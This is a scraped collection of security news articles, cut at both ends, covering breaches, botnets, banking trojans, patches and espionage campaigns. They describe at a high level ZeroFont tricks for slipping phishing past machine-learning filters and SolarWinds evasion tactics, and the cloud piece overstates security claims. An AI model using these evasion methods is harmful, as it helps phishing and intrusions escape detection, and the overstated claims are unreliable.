Security company Secunia has also picked up on the flaw, saying it could be used in a privilege escalation attack, or a denial of service hit. ""The vulnerability is confirmed on a fully patched Windows 7 x86 Professional (win32k.sys version 6.1.7601.18126) and reported on Windows 8. Other versions may also be affected.""
Ormandy had first published information about the vulnerability in March to GitHub in an effort to solicit help or entice other researchers to investigate.
'Black Friday' and 'Cyber Monday' — 4 Scams To Watch Out For While Shopping,https://thehackernews.com/2014/11/black-friday-and-cyber-monday-4-scams_26.html,"Holiday Shopping season is really an excited time for both shoppers and retailers, but unfortunately it's a good time for cyber criminals and scammers as well.
With Black Friday (28th November 2014) and Cyber Monday (1st December 2014) coming up, you need to be more careful while shopping. These are the two very busy shopping days where shoppers spend millions online.
Every eye will be on retailers to ensure that consumers' online shopping experiences are straightforward and, most importantly, secure. So, at the major part, retailers need to pay attention to extra security measures in order to prevent themselves from massive data breaches, like Target data breach that occurred last year during the Black Friday sales in which over 40 million Credit & Debit cards were stolen.
Not just Target alone, multiple retailers including Neiman Marcus, Michaels Store were also targeted during last Christmas holiday, involving the heist of possibly 110 million Credit-Debit cards, and personal information.
So, in an effort to secure yourself from scammers you need to be aware of some top scams and tips to keep yourself safe online.
In order to fraud an online account holder's financial information, scammers could pose their website as a legitimate one. Like you got an email from Amazan.com for the hottest deals, and not Amazon, make sure before providing your financial details.
Check properly thrice who emails are from and if it's an unknown, best way is to avoid the email and the so-called hottest deal. Always go for a website using an HTTPS URL, before entering a password or any information like address or credit card number.
There are thousands of websites that closely resemble legitimate domains like Amazon, Google, Apple, Facebook and Microsoft. Apart from these, there are so many new sites offering online shopping, that it's quite difficult for customers to say which one is legitimate and which is not.
Many of these websites host exciting contests or advertisements for dodgy services to gain your attention and force your finger to click it, while others host malware that can infect your system when you browse to these websites.
So, to be in safer side, always shop from websites which you or your friends know. Just keep one thing in mind while shopping online that Website ratings and security seals can be faked and the website could look too good to be true, but probably it's not.
Phishing scams are typically fraudulent email messages, masquerading as a well known and trustworthy entity in an attempt to gather personal and financial information from victims. However, phishing attacks have become more sophisticated recently.
Keep an eye on scams emails claiming to come from legitimate sources which will ask you to visit a website actually hosted by cyber crooks in order to steal your personal information like email addresses, passwords, credit card numbers, expiration date, verification code, and more.
Always type website name in Google Search Engine and then visit the particular website from those search results, instead visiting through any link provided in messages or emails. Don't go to websites you've never heard of.
A year ago during Black Friday, one of the major scams was the cyber criminals offering $1,000 Best Buy gift cards, which nobody won. But, a lot of people ended up in giving away their personal information for no reason at all.
Online users are recommended to avoid such ""unexpected gifts"" scams, just like your dear ones recommend you to not accept unexpected gifts from strangers. Emails could be a major medium to offer you unwanted gifts, so be careful when opening attachments you receive by email - that special delivery could end up costing you.
Customers on holiday season are always on search for great deals, especially on Black Friday and Cyber Monday, but your just a small mistake can lead you to danger. Miscreants use your desires by creating 'click-bait' ads or posting links to 'the best deal ever', which will always lead to either a survey, a scam site or even drive-by exploits.
Customers are advised to treat such offers with skepticism, especially when the source is unknown and unfamiliar to you. You are also advised to keep an updated Antivirus software onto their systems, so if any convincing advert does trick you and gain your click, your AV protects you against infection.
In addition to fake ads for Best Buy, users also want to look out for fake online coupons in general. If it sounds too good to be true, visit directly to reputable websites, and, by some miracle, the offer is true because it's Black Friday sales, it's all yours.
British Hacker Admits Using Mirai Botnet to DDoS Deutsche Telekom,https://thehackernews.com/2017/07/mirai-botnet-ddos.html,"An unnamed 29-year-old man, named by authorities as ""Daniel K.,"" pleaded guilty in a German court on Friday to charges related to the hijacking of more than one Million Deutsche Telekom routers.
According to reports in the German press, the British man, who was using online monikers ""Peter Parker"" and ""Spiderman,"" linked to domains used to launch cyber attacks powered by the notorious Mirai malware has been pleaded guilty to ""attempted computer sabotage.""
The suspect was arrested on 22nd February this year at Luton airport in London by Britain's National Crime Agency (NCA) at the request of the Federal Criminal Police Office of Germany, aka the Bundeskriminalamt (BKA).
The hacker, also known as 'BestBuy,' admitted to the court on Friday that he was behind the cyber attack that knocked more than 1.25 Million customers of German telecommunications provider Deutsche Telekom offline last November.
According to the German authorities, the attack was especially severe and was carried out to compromise the home routers to enrol them in a network of hijacked devices popularly called Botnet, which is being offered for sale on dark web markets for launching DDoS attacks.
Late last year, Deutsche Telekom's routers became infected with a modified version of the Mirai malware – infamous IoT malware which scans for insecure routers, cameras, DVRs, and other IoT devices and enslaves them into a botnet network – causing over a million pounds' worth of damage, the company said at the time.
Mirai is the same botnet that knocked the entire Internet offline last year by launching massive distributed denial of Service (DDoS) attacks against the Dyn DNS provider, crippling some of the world's biggest and most popular websites, including Twitter, Netflix, Amazon, Slack, and Spotify.
Mirai leveraged attack experienced sudden rise after a cyber criminal in October 2016 publicly released the source code of Mirai, which is then used to by many cyber criminals to launch DDoS attacks.
The hacker reportedly told the court that a Liberian internet service provider (ISP) paid him $10,000 to carry out the attack against its competitors., and that Deutsche Telekom was not the main target of his attack.
At the time of his arrest, the suspect faced up to 10 years in prison. He's due to be sentenced on July 28.
The BKA got involved in the investigation as the attack on Deutsche Telekom was deemed to be a threat to the nation's communication infrastructure.
The investigation involved close cooperation between British, German and Cypriot law enforcement agencies, backed by the European Union's law enforcement intelligence agency, Europol, and Eurojust.
Yikes! Three armed men tried to rob a Bitcoin Exchange in Canada,https://thehackernews.com/2018/01/cryptocurrency-exchange-robbery.html,"As many non-tech savvy people think that Bitcoin looks like a Gold coin as illustrated in many stock images, perhaps these robbers also planned to rob a cryptocurrency exchange thinking that way.
All jokes apart, we saw one such attempt on Tuesday morning, when three men armed with handguns entered the offices of a Canadian Bitcoin exchange in Ottawa, and restrained four of its employees.
The intruders then struck one of the employees in the head with a handgun, asking them to make an outbound transaction from the cryptocurrency exchange.
A fifth employee in another cabin, who remained unseen in an office, called the police before any assets could be taken, and the robbers left empty-handed.
One of the suspects arrested later Wednesday after arriving police officers saw him run into a ravine north of Colonnade Road and deployed ""extensive resources,"" including K-9 unit officers, to find him, CBC News reports.
""Police are looking for two additional suspects, both described as black males,"" the police says. ""Investigators are also interested in identifying and speaking to a person of interest that was inside the premise as the suspects arrived. That person did not remain at the scene.""
The suspect in custody, identified as 19-year-old Jimmy St-Hilaire, has been charged with the following offences:
5 counts of robbery with a firearm
5 counts of point a firearm
5 counts of forcible confinement
Wear disguise
Conspiracy to Commit an indictable offence
Carry concealed weapon
Possess firearm while prohibited
Possess weapon for committing an offence
Possess loaded regulated firearm
St-Hilaire is set to appear in court on January 24, 2018. Ottawa police are now looking for the remaining two suspects.
The authorities have not revealed the name of the cryptocurrency exchange.
A similar incident happened last month when armed robbers kidnapped a top executive at UK-registered crypto-exchange EXMO Finance and allegedly stole more than $1.8 million of Ether for releasing him.
The New York District Attorney's Office charged New Jersey native Louis Meza for the kidnapping and robbery, claiming Meza held ""demanded that the victim turns over his cell phone, wallet, and keys while holding the victim at gunpoint.""
"Staysure Hacked, Credit Card details of 93,000 Customers stolen",https://thehackernews.com/2014/01/Staysure-hacked-credit-card-data-breach.html,"Staysure, a UK based Insurance company has suffered a massive data breach. More than 93,000 customers' sensitive financial data may have been compromised by unknown hackers.
We became aware of the problem on November 14, and quickly informed the relevant card issuing bodies and subsequently The Financial Conduct Authority, the Information Commissioner's Office and the Police.
The company notified that their systems have suffered cyber attack during the second half of October 2013 and Customers' Data including names, addresses, payment card details and CVV numbers has stolen.
In that attack, encrypted payment card details of customers who purchased insurance from us before May 2012 were stolen, along with CVV details and customer names and addresses. From May 2012 we ceased to store this data.
Credit card details were encrypted, but the CVV number was in the clear text, which is not good. Now this is not confirmed that their encryption implementation was secure or not. However if the payment card number is encrypted, then a hacker couldn't get the encrypted card number back so they couldn't use the CVV number anyway.
We immediately removed the software and systems that the attackers exploited, and we are confident that we are taking the right steps to protect our customers in the future.
Now any affected customers are being given free access to an identity monitoring service. The company has hired an Independent forensic data experts to fully ascertain the problem.
Carberp Banking Trojan Scam - 8 Arrested in Russia,https://thehackernews.com/2012/03/carberp-banking-trojan-scam-8-arrested.html,"Carberp Banking Trojan Scam - 8 Arrested in Russia
8 Men suspected of being involved in the Carberp phishing scam have been arrested in Russia. The men were arrested after a joint investigation by the Russian Ministry of Internal Affairs (MVD) and Federal Security Service (FSB).
According to the MVD, the investigation found that two brothers were the ringleaders of the gang, and developed a plan to steal money from the accounts of online banking customers. The eight suspects allegedly stole more than 60 million Rubles ($2 million) from 90 victims using the Carberp Trojan.
Russian security firm who assisted with the investigation, pegged the stolen loot at 130 million Rubles ($4.5 million). Police confiscated computers, bank cards, notary equipment, fake documentation, and more than 7 million Rubles ($240,000) in cash during the raid.
The gang used the Carberp and RDP-door Trojans to snare victims. Carberp is a well-known Trojan that was recently seen on Facebook as part of a scam where attackers notify Facebook users that their accounts are temporarily locked. All they had to do to get them back was provide their first and last names, email addresses, dates of birth, passwords, and a 20-euro Ukash voucher.
The suspects will be accused of creating, using and disseminating of harmful computer programs, theft and illegal access to computer information and, if convicted, could be jailed for up to 10 years.
In addition to bank fraud, the gang was also involved in distributed denial-of-service attacks, the security firm found.
Malware Infects US Power Plants through USB Drives,https://thehackernews.com/2013/01/malware-infects-us-powers-through-usb.html,"The US Department of Homeland Security's Cyber Emergency Response Team has released a report, which stated that two American electrical power plants were compromised late last year and has identified a number of glaring electronic vulnerabilities.
Some unknown malware infected two power plants control systems using unprotected USB drives as an attack vector. The tainted USB drive came in contact with a handful of machines at the power generation facility and investigators found sophisticated malware on two engineering workstations critical to the operation of the control environment.
The report did not say if the computers did or did not have up-to-date antivirus software, but it did say that current software would have found the malware.
The other infection affected 10 computers in a turbine control system. It was also spread by a USB drive and resulted in downtime for the impacted systems and delayed the plant restart by approximately three weeks.
ICS-CERT recommended that the power facility adopt new USB use guidelines, including the cleaning of a USB device before each use.
Email Phishers Using A Simple Way to Bypass MS Office 365 Protection,https://thehackernews.com/2018/06/email-phishing-protection.html,"Security researchers have been warning about a simple technique that cyber criminals and email scammers are using in the wild to bypass most AI-powered phishing detection mechanisms implemented by widely used email services and web security scanners.
Dubbed ZeroFont, the technique involves inserting hidden words with a font size of zero within the actual content of a phishing email, keeping its visual appearance same, but at the same time, making it non-malicious in the eyes of email security scanners.
According to cloud security company Avanan, Microsoft Office 365 also fails to detect such emails as malicious crafted using ZeroFont technique.
Like Microsoft Office 365, many emails and web security services use natural language processing and other artificial intelligence-based machine learning techniques to identify malicious or phishing emails faster.
The technology helps security companies to analyze, understand and derive meaning from unstructured text embedded in an email or web page by identifying text-based indicators, like email scams mimicking a popular company, phrases used to request for payments or password resets, and more.
However, by adding random zero font-size characters between the indicator texts present in a phishing email, cybercriminals can transform these indicators into an unstructured garbage text, hiding them from the natural language processing engine.
Therefore, the email looks normal to a human eye, but Microsoft reads the entire garbage text, even if some words are displayed with a font size of ""0.""
""Microsoft can not identify this as a spoofing email because it cannot see the word 'Microsoft' in the un-emulated version,"" reads Avanan's blog post. ""Essentially, the ZeroFont attack makes it possible to display one message to the anti-phishing filters and another to the end user.""
Besides the ZeroFont technique, Avanan also detected hackers using other similar tricks that involve Punycode, Unicode, or Hexadecimal Escape Characters in their phishing attacks.
Last month, researchers from the same company reported that cybercriminals had been splitting up the malicious URL in a way that the Safe Links security feature in Office 365 fails to identify and replace the partial hyperlink, eventually redirecting victims to the phishing site.
Experts Uncover Malware Attacks Against Colombian Government and Companies,https://thehackernews.com/2021/01/experts-uncover-malware-attacks-against.html,"Cybersecurity researchers took the wraps off an ongoing surveillance campaign directed against Colombian government institutions and private companies in the energy and metallurgical industries.
In a report published by ESET on Tuesday, the Slovak internet security company said the attacks — dubbed ""Operation Spalax"" — began in 2020, with the modus operandi sharing some similarities to an APT group targeting the country since at least April 2018, but also different in other ways.
The overlaps come in the form of phishing emails, which have similar topics and pretend to come from some of the same entities that were used in a February 2019 operation disclosed by QiAnXin researchers, and subdomain names used for command-and-control (C2) servers.
However, the two campaigns diverge in the attachments used for phishing emails, the remote access trojans (RATs) deployed, and the C2 infrastructure employed to fetch the malware dropped.
The attack chain begins with the targets receiving phishing emails that lead to the download of malicious files, which are RAR archives hosted on OneDrive or MediaFire containing various droppers responsible for decrypting and running RATs such as Remcos, njRAT, and AsyncRAT on a victimized computer.
The phishing emails cover a wide range of topics, including those about driving infractions, attend court hearings, and take mandatory COVID-19 tests, thus increasing the likelihood that unsuspecting users will open the messages.
In an alternate scenario observed by ESET, the attackers were also found to use heavily obfuscated AutoIt droppers that used shellcode to decrypt the payload and another to inject it into an already running process.
The RATs not only come with capabilities for remote control but also to spy on targets by capturing keystrokes, recording screenshots, stealing clipboard data, exfiltrating sensitive documents, and even downloading and executing other malware.
ESET's analysis also revealed a scalable C2 architecture operated using a Dynamic DNS service that allowed them to dynamically assign a domain name to an IP address from a pool of 70 different domain names and 24 IP addresses in the second half of 2020 alone.
""Targeted malware attacks against Colombian entities have been scaled up since the campaigns that were described last year,"" the researchers concluded. ""The landscape has changed from a campaign that had a handful of C2 servers and domain names to a campaign with very large and fast-changing infrastructure with hundreds of domain names used since 2019.""
Ubuntu-Maker Canonical's GitHub Account Gets Hacked,https://thehackernews.com/2019/07/canonical-ubuntu-github-hacked.html,"An unknown hacker yesterday successfully managed to hack into the official GitHub account of Canonical, the company behind the Ubuntu Linux project and created 11 new empty repositories.
It appears that the cyberattack was, fortunately, just a ""loud"" defacement attempt rather than a ""silent"" sophisticated supply-chain attack that could have been abused to distribute modified malicious versions of the open-source Canonical software.
In a statement, David from Canonical confirmed that attacker(s) used a Canonical owned GitHub account whose credentials were compromised to unauthorizedly access Canonical's Github account.
""We can confirm that on 2019-07-06 there was a Canonical owned account on GitHub whose credentials were compromised and used to create repositories and issues among other activities,"" David said.
""Canonical has removed the compromised account from the Canonical organization in GitHub and is still investigating the extent of the breach, but there is no indication at this point that any source code or PII was affected.""
David also confirmed that since the company now uses Launchpad hosting platform to build and maintain Ubuntu distributions, unauthorized changes on its Github account doesn't affect its popular and widely-used Linux operating system and its million of users.
""Furthermore, the Launchpad infrastructure where the Ubuntu distribution is built and maintained is disconnected from GitHub, and there is also no indication that it has been affected,"" David added.
""We plan to post a public update after our investigation, audit, and remediations are finished. Thank you, your trust in Canonical is important to us, which is why we take privacy and security a priority.""
The company is currently reviewing the source code available on GitHub to investigate the extent of the breach and have promised to share more details about the incident shortly.
Last year, GitHub account of Gentoo Linux distribution was also hacked using password-guessing attack, and attackers successfully managed to replace the content of its repositories and pages with malware.
Stay tuned for more information on this incident.
Android July 2019 Security Update Patches 33 New Vulnerabilities,https://thehackernews.com/2019/07/android-security-update.html,"Google has started rolling out this month's security updates for its mobile operating system platform to address a total of 33 new security vulnerabilities affecting Android devices, 9 of which have been rated critical in severity.
The vulnerabilities affect various Android components, including the Android operating system, framework, library, media framework, as well as Qualcomm components, including closed-source components.
Three of the critical vulnerabilities patched this month reside in Android's Media framework, the most severe of which could allow a remote attacker to execute arbitrary code on a targeted device, within the context of a privileged process, by convincing users into opening a specially crafted malicious file.
""The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed,"" the company says.
Out of the remaining seven critical vulnerabilities, one affects Android Library, one affects the System, two resides in Qualcomm components (one in DSP_Services and one in Kernel), and three resides in Qualcomm closed-source components.
Besides this, a high-severity flaw (CVE-2019-2104) in the Android Framework could allow an installed malicious app to bypass user interaction requirements in an attempt to gain access to additional permissions.
Six high-severity vulnerabilities addressed in Qualcomm components resides in WLAN Host (CVE-2019-2276, CVE-2019-2307), WLAN Driver (CVE-2019-2305), HLOS (CVE-2019-2278), and Audio (CVE-2019-2326, CVE-2019-2328).
According to the Android security advisory, none of the flaws addressed this month were publicly disclosed or found being exploited in the wild.
Apart from releasing patches for security vulnerabilities, the Android Security Patch for July 2019 also includes fixes for various issues in some of the supported version of Pixel devices.
Pixel smartphone users will get the July updates shortly, while others will have to wait for their Android device manufacturers or service providers to roll out the security patches for their devices.
Users are strongly recommended to download the most recent Android security updates as soon as they are available in order to keep their Android devices protected against any potential attack.
SwaggSec gained access to China Telecom and Warner Bros,https://thehackernews.com/2012/06/swaggsec-gained-access-to-china-telecom.html,"SwaggSec gained access to China Telecom and Warner Bros
A hacking group is claiming to have breached the networks of Warner Bros. and China Telecom, releasing documents and publishing login credentials. Swagg Security, or SwaggSec, the same hacker collective that breached Foxconn a few months ago to highlight the poor working conditions, has made its comeback.
The hacking group posted on their Twitter account (under the name Swagg Security) that they had acquired access to the databases of both sites, as well as posted a statement on Pastebin. The group has allegedly stolen documents and login credentials, which were then posted to Pirate Bay.
The torrent file posted by SwaggSec on The Pirate Bay doesn't contain only the administrator details from China Telecom, but also some other information taken from their databases. SwaggSec said the China Telecom data is 900 user names and passwords for administrators on the company's network. The information was obtained through an insecure SQL server, SwaggSec said in its post.
The group said it notified China Telecom of the hack by planting a message in the company's network. The SQL server was moved but not fixed.
It includes a recent report titled 'Content Security Status Update', which includes a list of the company's top 10 medium-to-high-risk vulnerabilities. The top two are cross-site scripting and unsupported SSL.
Cisco Takes Down Ransomware Operation Generating $30 Million in Revenue For Hackers,https://thehackernews.com/2015/10/ransomware-hacking.html,"This will blow the minds of every single cyber criminal group out there – Researchers have discovered a group of hackers that is making an estimated $30 Million a year from their online criminal operation.
Yes, $30 MILLLLLLION annually.
Researchers from cyber security firm Cisco announced that they discovered a large ransomware campaign connected to the Angler Exploit Kit, one of the most potent exploit kits available in the underground market for hacking into computers.
Researchers noticed that the large percentage of infected users were connecting to servers belonging to hosting provider Limestone Networks. After digging out more, they estimated that a single hacker or a group of hackers is targeting up to 90,000 end users a day.
Here are some estimates by Cisco researchers after investigating the operation:
Life of an Angler exploit server is one day
Around 3600 users are compromised per day by ransomware
3% of targets paid the average ransom demand of $300 to the hackers
As a result, the researchers estimated that this particular hacker or a group of hackers is generating an annual revenue of more than $34 Million.
Remember, it's just a figure estimated by Cisco researchers following the log files retrieved from just one server. The actual number could be even larger than $30 Million annually, but we can not immediately come to any conclusions.
Researchers from Cisco Systems' Talos Security unit noted that ""using simple math [one] can easily determine that this [particular] adversary is making potentially $3 Million a month,"" but ""It is difficult to be 100% accurate with these numbers.""
Hackers Making $60 Million Annually
The security firm also claims that this hacker or group of hackers is responsible for up to 50% of Angler Exploit Kit activity, which means that the Angler kit might be generating revenue of more than $60M annually for hackers around the world.
The affected hosting provider Limestone Networks have since shut down the malicious servers after Cisco researchers contacted them.
Angler Exploit kit, first identified in late 2013, has managed to become one of the most popular exploit kits in the market. Essentially it packages a number of hacking tools that take advantage of vulnerabilities Flash, Java and other browser plugins to break into targets' systems.
Now cyber criminals are making use of ransomware in their kit that yield them more money per attack.
""This is a significant blow to the emerging hacker economy,"" researchers said, ""where ransomware and the black market sale of stolen IP, credit card info and personally identifiable information (PII) are generating hundreds of millions of dollars annually.""
How to Protect Against Ransomware?
However, there are several ways to help protect your computer against ransomware and other malware threats:
Make sure to keep all of the software on your computer up to date.
Make sure that automatic updating is turned on to get all the latest security updates.
Use secure connections for sensitive transactions.
Never open any attachment unless you know who it's from and why they are sending it.
Use virtual keyboard for internet banking.
Use strong alphanumeric and symbol passwords.
Common sense is another useful weapon in the fight against viruses.
Also Read:
How to protect your computer from CryptoLocker ransomware malware?
Free CryptoLocker Ransomware Decryption Tool Released
CoinVault Ransomware Decryption Tool Released
'Tox' Offers Free build-your-own Ransomware Malware Toolkit
Microsoft to patch three critical vulnerabilities on Tuesday,https://thehackernews.com/2012/07/microsoft-to-patch-three-critical.html,"Microsoft to patch three critical vulnerabilities on Tuesday
When Patch Tuesday rolls around next week, Three critical vulnerabilities , as well as six Important issues will be addressed by Microsoft. Only three of the nine security bulletins are ranked Critical, while the remaining six are rated as Important.
Although all three of of the Critical vulnerabilities center on Windows, one of them also includes Internet Explorer 9. Interestingly, the flaw does not extend to previous versions of the browser, so it appears it's something new.
The two other critical bulletins could allow malicious users to remotely execute code on Windows operating systems, including all supported server and client versions. ""Many are expecting a patch for CVE-2012-1889: a vulnerability in Microsoft XML Core Services, which is currently being exploited in the wild,"" says Marcus Carey, a security researcher with Rapid7.
Get the full details when the security bulletins are officially released next Tuesday. Happy patching next week!
Critical Flaw in All Blizzard Games Could Let Hackers Hijack Millions of PCs,https://thehackernews.com/2018/01/dns-rebinding-attack-hacking.html,"A Google security researcher has discovered a severe vulnerability in Blizzard games that could allow remote attackers to run malicious code on gamers' computers.
Played every month by half a billion users—World of Warcraft, Overwatch, Diablo III, Hearthstone and Starcraft II are popular online games created by Blizzard Entertainment.
To play Blizzard games online using web browsers, users need to install a game client application, called 'Blizzard Update Agent,' onto their systems that run JSON-RPC server over HTTP protocol on port 1120, and ""accepts commands to install, uninstall, change settings, update and other maintenance related options.""
Google's Project Zero team researcher Tavis Ormandy discovered that the Blizzard Update Agent is vulnerable to a hacking technique called the ""DNS Rebinding"" attack that allows any website to act as a bridge between the external server and your localhost.
Just last week, Ormandy revealed a similar vulnerability in a popular Transmission BitTorrent app that could allow hackers to remotely execute malicious code on BitTorrent users' computers and take control of them.
By simply creating a DNS entry to bind any attacker-controlled web page with localhost ( and tricking users into visiting it, hackers can easily send privileged commands to the Blizzard Update Agent using JavaScript code.
Although a random website running in a web browser usually cannot make requests to a hostname other than its own, the local Blizzard updater service does not validate what hostname the client was requesting and responds to such requests.
Blizzard DNS Rebinding Attack — Proof of Concept Exploit
Ormandy has also published a proof-of-concept exploit that executes DNS rebinding attack against Blizzard clients and could be modified to allow exploitation using network drives, or setting destination to ""downloads"" and making the browser install malicious DLLs, data files, etc.
Ormandy responsibly reported Blizzard of the issue in December to get it patched before hackers could take advantage of it to target hundreds of millions of gamers.
However, after initially communication, Blizzard inappropriately stopped responding to Ormandy's emails and silently applied partial mitigation in the client version 5996.
""Blizzard was replying to emails but stopped communicating on December 22nd. Blizzard is no longer replying to any enquiries, and it looks like in version 5996 the Agent now has been silently patched with a bizarre solution,"" Ormandy says.
""Their solution appears to be to query the client command line, get the 32-bit FNV-1a string hash of the exename and then check if it's in a blacklist. I proposed they whitelist Hostnames, but apparently, that solution was too elegant and simple. I'm not pleased that Blizzard pushed this patch without notifying me, or consulted me on this.""
After the Ormandy's report went public, Blizzard contacted and informed him that a more robust Host header whitelist fix to address the issue entirely is currently being developed for deployment.
Ormandy is also checking other big games vendors with a user base of over 100 Million to see if the problem can be replicated.
Here's How SolarWinds Hackers Stayed Undetected for Long Enough,https://thehackernews.com/2021/01/heres-how-solarwinds-hackers-stayed.html,"Microsoft on Wednesday shared more specifics about the tactics, techniques, and procedures (TTPs) adopted by the attackers behind the SolarWinds hack to stay under the radar and avoid detection, as cybersecurity companies work towards getting a ""clearer picture"" of one of the most sophisticated attacks in recent history.
Calling the threat actor ""skillful and methodic operators who follow operations security (OpSec) best practices,"" the company said the attackers went out of their way to ensure that the initial backdoor (Sunburst aka Solorigate) and the post-compromise implants (Teardrop and Raindrop) are separated as much as possible so as to hinder efforts to spot their malicious activity.
""The attackers behind Solorigate are skilled campaign operators who carefully planned and executed the attack, remaining elusive while maintaining persistence,"" researchers from Microsoft 365 Defender Research Team, Microsoft Threat Intelligence Center (MSTIC), and Microsoft Cyber Defense Operations Center (CDOC) said.
While the exact identity of the group tracked as StellarParticle (CrowdStrike), UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), and Dark Halo (Volexity) remains unknown as yet, the U.S. government earlier this month formally tied the espionage campaign to a group likely of Russian origin.
A Variety of Tactics to Stay Undetected
Microsoft's timeline of the attacks shows that the fully-functional Sunburst DLL backdoor was compiled and deployed onto SolarWinds' Orion platform on February 20, following which it was distributed in the form of tampered updates sometime in late March.
An almost two-month-long reconnaissance period to profile its targets — something that requires a stealthy persistence to remain undetected and collect valuable information — ultimately paved the way for the deployment of Cobalt Strike implants on selected victim networks in May and the removal of Sunburst from SolarWinds build environment on June 4.
But answers as to how and when the transition from Sunburst to Raindrop occurs has yielded little definitive clues, even if it appears that the attackers deliberately separated the Cobalt Strike loader's execution from the SolarWinds process as an OpSec measure.
The idea is that in the event the Cobalt Strike implants were discovered on target networks, it wouldn't reveal the compromised SolarWinds binary and the supply chain attack that led to its deployment in the first place.
The findings also make it clear that, while the hackers relied on an array of attack vectors, the trojanized SolarWinds software formed the core of the espionage operation:
Methodic avoidance of shared indicators for each compromised host by deploying custom Cobalt Strike DLL implants on each system
Camouflaging malicious tools and binaries to mimic existing files and programs already present on the compromised machine
Disabling event logging using AUDITPOL before hands-on keyboard activity and enabling it back once complete
Creating special firewall rules to minimize outgoing packets for certain protocols before running noisy network enumeration activities that were later removed after the network survey
Executing lateral movement activities only after disabling security services on targeted hosts
Allegedly using timestomping to change artifacts' timestamps and leveraging wiping procedures and tools to prevent discovery of malicious DLL implants
Adopting a Zero Trust Mentality
""This attack was simultaneously sophisticated and ordinary,"" Microsoft said. ""The actor demonstrated sophistication in the breadth of tactics used to penetrate, expand across, and persist in affected infrastructure, but many of the tactics, techniques, and procedures (TTPs) were individually ordinary.""
To protect against such attacks in the future, the company recommends that organizations adopt a ""zero trust mentality"" to achieve least privileged access and minimize risks by enabling multi-factor authentication.
""With Solorigate, the attackers took advantage of broad role assignments, permissions that exceeded role requirements, and in some cases abandoned accounts and applications which should have had no permissions at all,"" Alex Weinert, Microsoft's director of identity security, said.
Chinese Cyber Espionage Hackers Continue to Target Pulse Secure VPN Devices,https://thehackernews.com/2021/05/chinese-cyber-espionage-hackers.html,"Cybersecurity researchers from FireEye unmasked additional tactics, techniques, and procedures (TTPs) adopted by Chinese threat actors who were recently found abusing Pulse Secure VPN devices to drop malicious web shells and exfiltrate sensitive information from enterprise networks.
FireEye's Mandiant threat intelligence team, which is tracking the cyber espionage activity under two activity clusters UNC2630 and UNC2717, said the intrusions line up with key Chinese government priorities, adding ""many compromised organizations operate in verticals and industries aligned with Beijing's strategic objectives outlined in China's recent 14th Five Year Plan.""
On April 20, the cybersecurity firm disclosed 12 different malware families, including STEADYPULSE and LOCKPICK, that have been designed with the express intent to infect Pulse Secure VPN appliances and put to use by at least two cyber espionage groups believed to be affiliated with the Chinese government.
FireEye's continued investigation into the attacks as part of its incident response efforts has uncovered four more malware families deployed by UNC2630 — BLOODMINE, BLOODBANK, CLEANPULSE, and RAPIDPULSE — for purposes of harvesting credentials and sensitive system data, allowing arbitrary file execution, and removing forensic evidence.
In addition, the threat actors were also observed removing web shells, ATRIUM, and SLIGHTPULSE, from dozens of compromised VPN devices between April 17 and April 20 in what the researchers describe as ""unusual,"" suggesting ""this action displays an interesting concern for operational security and a sensitivity to publicity.""
At the heart of these intrusions lies CVE-2021-22893, a recently patched vulnerability in Pulse Secure VPN devices that the adversaries exploited to gain an initial foothold on the target network, using it to steal credentials, escalate privileges, conduct internal reconnaissance by moving laterally across the network, before maintaining long-term persistent access, and accessing sensitive data.
""Both UNC2630 and UNC2717 display advanced tradecraft and go to impressive lengths to avoid detection. The actors modify file timestamps and regularly edit or delete forensic evidence such as logs, web server core dumps, and files staged for exfiltration,"" the researchers said. ""They also demonstrate a deep understanding of network appliances and advanced knowledge of a targeted network. This tradecraft can make it difficult for network defenders to establish a complete list of tools used, credentials stolen, the initial intrusion vector, or the intrusion start date.""
How Cloud-Based Automation Can Keep Business Operations Secure,https://thehackernews.com/2019/09/how-cloud-based-automation-can-keep.html,"The massive data breach at Capital One – America's seventh-largest bank, according to revenue – has challenged many common assumptions about cloud computing for the first time.
Ironically, the incident, which exposed some 106 million Capital One customers' accounts, has only reinforced the belief that the cloud remains the safest way to store sensitive data.
""You have to compare [the cloud] not against 'perfect' but against 'on-premises.'"" Ed Amoroso, a former chief security officer at AT&T, told Fortune magazine this week.
He wasn't the only voice defending cloud computing in the wake of a hack attack. In an article titled ""Don't Doubt the Cloud,"" Fortune columnist Robert Hackett, wrote: ""The cloud is undeniably convenient and, more importantly, better in terms of security than what the majority of companies can achieve alone.""
The problem, experts said, was not cloud computing but rather the tendency for companies to become overly-reliant on cloud computing services like Amazon Web Services to oversee all aspects of security, instead of taking full responsibility for their data security.
Security Advantages of Cloud-Based System
After taking the necessary steps to ensure the safety of their data, companies benefit in numerous ways from the collective security of the cloud.
1. Services such as SaaS (Software as a Service) are hosted on cloud servers
With the collective power of the cloud, the changes are extremely high that the servers hosting your data are better protected than your on-site servers would be. In addition, the cloud service provider handles all maintenance, updates, and support. That takes a great deal of pressure off the IT department.
This is both the biggest benefit of cloud computing and possibly the biggest area of risk. While a service such as Amazon Cloud Services has security resources few companies can match, it must be remembered that placing data in on the cloud is to take it out of complete control by your company. The firewalls protecting the data are no longer your own.
But since your company is still working with the data, it must be secured at a high level on your end. That means compliance with SOC 2 and ISO/27001.
2. Greatly Reduce Human Error – the Single Biggest Threat to Data Safety
With fewer people having access to the data, there are fewer opportunities for errors that lead to data breaches. Too often, hackers can get through the most secure firewalls because someone on the other side carelessly clicked through a link that was planted by a hacker, usually in an email.
But since the data is stored on servers in the cloud, not on-premises, those types of hacks will not result in data breaches.
In addition, adding a layer of automation could reduce the amount of human interaction even more. Start-ups such as PapayaGlobal offer automation in global payroll ears renowned for being the target of hackers, whilst other companies have developed solutions involving robotic process automation (RPA)—software bots that are capable of mimicking human actions.
Those bots are already being employed in areas such as book-keeping. The fewer people interacting with sensitive data, the safer the data will be.
3. Data Transfers Only Through Secure channels
Some of the most common data breaches are carried out through the most mundane methods. Hackers create ""spoof"" versions of popular email programs.
During tax season, when emails between financial departments and accounting firms are most intense, it's easy to fall for the crafty spoofs and wind up sending data directly to a cybercriminal.
Email is widely recognized as one of the worst ways to send private and sensitive data for a variety of reasons. Not surprisingly, the strict standard for data privacy set by the EU's GDPR forbids transferring private information through email.
With cloud computing, data is sent only through secure, encrypted channels. That eliminates the possibility of spoofs and other common ploys by hackers. It also keeps the data out of sight from hackers, significantly reducing the possibility that they would try to hack your data by other means.
4. Separation between work environment and storage environment
